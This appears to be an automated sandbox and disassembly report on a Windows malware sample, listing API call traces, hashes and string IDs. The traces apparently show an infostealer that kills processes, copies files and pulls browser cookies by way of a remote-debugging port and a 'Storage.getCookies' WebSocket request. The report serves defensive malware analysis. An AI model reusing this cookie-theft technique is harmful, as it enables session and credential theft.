                                  • Part of subcall function 010146A0: StrCmpCA.SHLWAPI(?,?), ref: 010146ED
                                  • Part of subcall function 010146A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 01014702
                                  • Part of subcall function 010146A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 01014711
                                  • Part of subcall function 010146A0: CloseHandle.KERNEL32(00000000), ref: 01014718
                                  • Part of subcall function 010146A0: Process32Next.KERNEL32(00000000,00000128), ref: 01014726
                                  • Part of subcall function 010146A0: CloseHandle.KERNEL32(00000000), ref: 01014731
                                • memset.MSVCRT ref: 00FF9862
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF9878
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF9889
                                • lstrcat.KERNEL32(00000000,01024B60), ref: 00FF989B
                                • memset.MSVCRT ref: 00FF98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00FF98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF9903
                                • StrStrA.SHLWAPI(00000000,00D6ECE8), ref: 00FF9919
                                • lstrcpyn.KERNEL32(012293D0,00000000,00000000), ref: 00FF9938
                                • lstrlen.KERNEL32(?), ref: 00FF994B
                                • wsprintfA.USER32 ref: 00FF995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 00FF9971
                                • memset.MSVCRT ref: 00FF9986
                                • Sleep.KERNEL32(00001388), ref: 00FF99E7
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                  • Part of subcall function 00FF92B0: strlen.MSVCRT ref: 00FF92E1
                                  • Part of subcall function 00FF92B0: strlen.MSVCRT ref: 00FF92FA
                                  • Part of subcall function 00FF92B0: strlen.MSVCRT ref: 00FF9399
                                  • Part of subcall function 00FF92B0: strlen.MSVCRT ref: 00FF93E6
                                  • Part of subcall function 01014740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 01014759
                                  • Part of subcall function 01014740: Process32First.KERNEL32(00000000,00000128), ref: 01014769
                                  • Part of subcall function 01014740: Process32Next.KERNEL32(00000000,00000128), ref: 0101477B
                                  • Part of subcall function 01014740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101479C
                                  • Part of subcall function 01014740: TerminateProcess.KERNEL32(00000000,00000000), ref: 010147AB
                                  • Part of subcall function 01014740: CloseHandle.KERNEL32(00000000), ref: 010147B2
                                  • Part of subcall function 01014740: Process32Next.KERNEL32(00000000,00000128), ref: 010147C0
                                  • Part of subcall function 01014740: CloseHandle.KERNEL32(00000000), ref: 010147CB
                                • CloseDesktop.USER32(?), ref: 00FF9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 2040986984-1862457068
                                • Opcode ID: 088dba1f927fedc3487e69eee139ecff7a481d2ba0ebcbb13ceed25d74bfe171
                                • Instruction ID: 1b8782e3648f8bc1e34449db39103d102dee2080e595a27d24ac757e8b0de059
                                • Opcode Fuzzy Hash: 088dba1f927fedc3487e69eee139ecff7a481d2ba0ebcbb13ceed25d74bfe171
                                • Instruction Fuzzy Hash: 34916471910218AFDB70DFB4DC89FEE77B8AF58700F504199F609A7194DBB4AA44CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01001291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010012B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010012BF
                                • lstrlen.KERNEL32(01024CA8), ref: 010012CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010012E7
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 010012F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0100133A
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100135C
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 01001376
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010013AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 010013D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010013E2
                                • lstrlen.KERNEL32(01021794), ref: 010013ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100140A
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001416
                                • lstrlen.KERNEL32(?), ref: 01001423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001443
                                • lstrcat.KERNEL32(00000000,?), ref: 01001451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100147A
                                • StrCmpCA.SHLWAPI(?,00D6D1B8), ref: 010014A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 010014E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001535
                                • StrCmpCA.SHLWAPI(?,00D6DCF0), ref: 01001552
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001593
                                • lstrcpy.KERNEL32(00000000,?), ref: 010015BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010015E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010017BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 010017F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100181C
                                • FindClose.KERNEL32(00000000), ref: 0100182B
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: a190df74cf76a8fb88f0e4b90bc075d39fd79b9c1c91737055753cddacce32f4
                                • Instruction ID: 35a778b29cd6a4cc7bda32cf7b2bad084a53561c130403b60eb1b27000128885
                                • Opcode Fuzzy Hash: a190df74cf76a8fb88f0e4b90bc075d39fd79b9c1c91737055753cddacce32f4
                                • Instruction Fuzzy Hash: 7CC1A77151021A9BEF72EF78DC89AAE7BF8AF04304F044068F989D7291DB78D945DB90
                                APIs
                                • wsprintfA.USER32 ref: 0100E22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 0100E243
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100E263
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 0100E27D
                                • wsprintfA.USER32 ref: 0100E2A2
                                • StrCmpCA.SHLWAPI(?,0101CFEC), ref: 0100E2B4
                                • wsprintfA.USER32 ref: 0100E2D1
                                  • Part of subcall function 0100EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0100EE12
                                • wsprintfA.USER32 ref: 0100E2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 0100E304
                                • lstrcat.KERNEL32(?,00D6F458), ref: 0100E335
                                • lstrcat.KERNEL32(?,01021794), ref: 0100E347
                                • lstrcat.KERNEL32(?,?), ref: 0100E358
                                • lstrcat.KERNEL32(?,01021794), ref: 0100E36A
                                • lstrcat.KERNEL32(?,?), ref: 0100E37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 0100E394
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E422
                                • DeleteFileA.KERNEL32(?), ref: 0100E45C
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100E49B
                                • FindClose.KERNEL32(00000000), ref: 0100E4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: d0f7bd821eaa1e72941b98b414998c0f6910b0dde25d24064886ffbd2cae1e51
                                • Instruction ID: 76204be9c96568f02e5292990914a01ac89cf17e976e9dd5ffbd39d44405c138
                                • Opcode Fuzzy Hash: d0f7bd821eaa1e72941b98b414998c0f6910b0dde25d24064886ffbd2cae1e51
                                • Instruction Fuzzy Hash: 3781627190021CABDB71EF64EC49EEE77B9BF44300F004998F64AA7195DB79AA44CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF16E2
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF176C
                                • lstrcat.KERNEL32(00000000), ref: 00FF1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF18FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: eda2a295b3a8f7863a0ebc97a68df4173308676f262c9bf5e842f1e26cac2dcf
                                • Instruction ID: c3bc779e855e600a9719a5f386ff42a82daaca5104c021a97a168a712b1266a8
                                • Opcode Fuzzy Hash: eda2a295b3a8f7863a0ebc97a68df4173308676f262c9bf5e842f1e26cac2dcf
                                • Instruction Fuzzy Hash: 68816C3191021EDBCB31EF64DD89ABE77B8BF14314F141128FA09AB265CB789D41EB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0100DD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0100DD4C
                                • wsprintfA.USER32 ref: 0100DD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 0100DD79
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100DD9C
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 0100DDB6
                                • wsprintfA.USER32 ref: 0100DDD4
                                • DeleteFileA.KERNEL32(?), ref: 0100DE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 0100DDED
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                  • Part of subcall function 0100D980: memset.MSVCRT ref: 0100D9A1
                                  • Part of subcall function 0100D980: memset.MSVCRT ref: 0100D9B3
                                  • Part of subcall function 0100D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100D9DB
                                  • Part of subcall function 0100D980: lstrcpy.KERNEL32(00000000,?), ref: 0100DA0E
                                  • Part of subcall function 0100D980: lstrcat.KERNEL32(?,00000000), ref: 0100DA1C
                                  • Part of subcall function 0100D980: lstrcat.KERNEL32(?,00D6EEB0), ref: 0100DA36
                                  • Part of subcall function 0100D980: lstrcat.KERNEL32(?,?), ref: 0100DA4A
                                  • Part of subcall function 0100D980: lstrcat.KERNEL32(?,00D6D248), ref: 0100DA5E
                                  • Part of subcall function 0100D980: lstrcpy.KERNEL32(00000000,?), ref: 0100DA8E
                                  • Part of subcall function 0100D980: GetFileAttributesA.KERNEL32(00000000), ref: 0100DA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100DE2E
                                • FindClose.KERNEL32(00000000), ref: 0100DE3D
                                • lstrcat.KERNEL32(?,00D6F458), ref: 0100DE66
                                • lstrcat.KERNEL32(?,00D6DB50), ref: 0100DE7A
                                • lstrlen.KERNEL32(?), ref: 0100DE84
                                • lstrlen.KERNEL32(?), ref: 0100DE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100DED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: eb3b4cf9dab9f4b7b37959842811e17cdcd83afde077ceb9ae6482574a7d8526
                                • Instruction ID: 108e827fffe6df1aa7037caf8393770374ecb4a7aa720fc18f29438520218171
                                • Opcode Fuzzy Hash: eb3b4cf9dab9f4b7b37959842811e17cdcd83afde077ceb9ae6482574a7d8526
                                • Instruction Fuzzy Hash: 86619171900218ABDB71EFB4EC89AEE77B9BF48300F0045A8F64597285DB38EB54DB50
                                APIs
                                • wsprintfA.USER32 ref: 0100D54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 0100D564
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100D584
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 0100D59E
                                • lstrcat.KERNEL32(?,00D6F458), ref: 0100D5E3
                                • lstrcat.KERNEL32(?,00D6F4A8), ref: 0100D5F7
                                • lstrcat.KERNEL32(?,?), ref: 0100D60B
                                • lstrcat.KERNEL32(?,?), ref: 0100D61C
                                • lstrcat.KERNEL32(?,01021794), ref: 0100D62E
                                • lstrcat.KERNEL32(?,?), ref: 0100D642
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100D682
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100D6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100D737
                                • FindClose.KERNEL32(00000000), ref: 0100D746
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: b344c6c0712f9afa34524ae027330b2e43d5408f00580d20e048a04bfb8ee246
                                • Instruction ID: bd466832aa0ea92f293698f1ec6b47e6bd228a7ad095ea1dc4a910e004f1cc04
                                • Opcode Fuzzy Hash: b344c6c0712f9afa34524ae027330b2e43d5408f00580d20e048a04bfb8ee246
                                • Instruction Fuzzy Hash: 30617471910119ABDF71EFB4DC88AEE77B8BF48304F0044A9E64997241DB38EA54CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: e7db6f78a1d6088dee815bc198d4eed50f15403b9076e644769042e1600e81fe
                                • Instruction ID: 1861ed432b0b6cebeadc947f3a4094a9ea92cb83c49bb5cdf178f9a34f64e625
                                • Opcode Fuzzy Hash: e7db6f78a1d6088dee815bc198d4eed50f15403b9076e644769042e1600e81fe
                                • Instruction Fuzzy Hash: DBA26971E012699FDB20CFA8CC807EDBBB6BF89310F1481A9D548A7255DB785E85CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010023D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010023F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01002402
                                • lstrlen.KERNEL32(\*.*), ref: 0100240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 01002436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01002486
                                Strings
                                Memory Dump Source
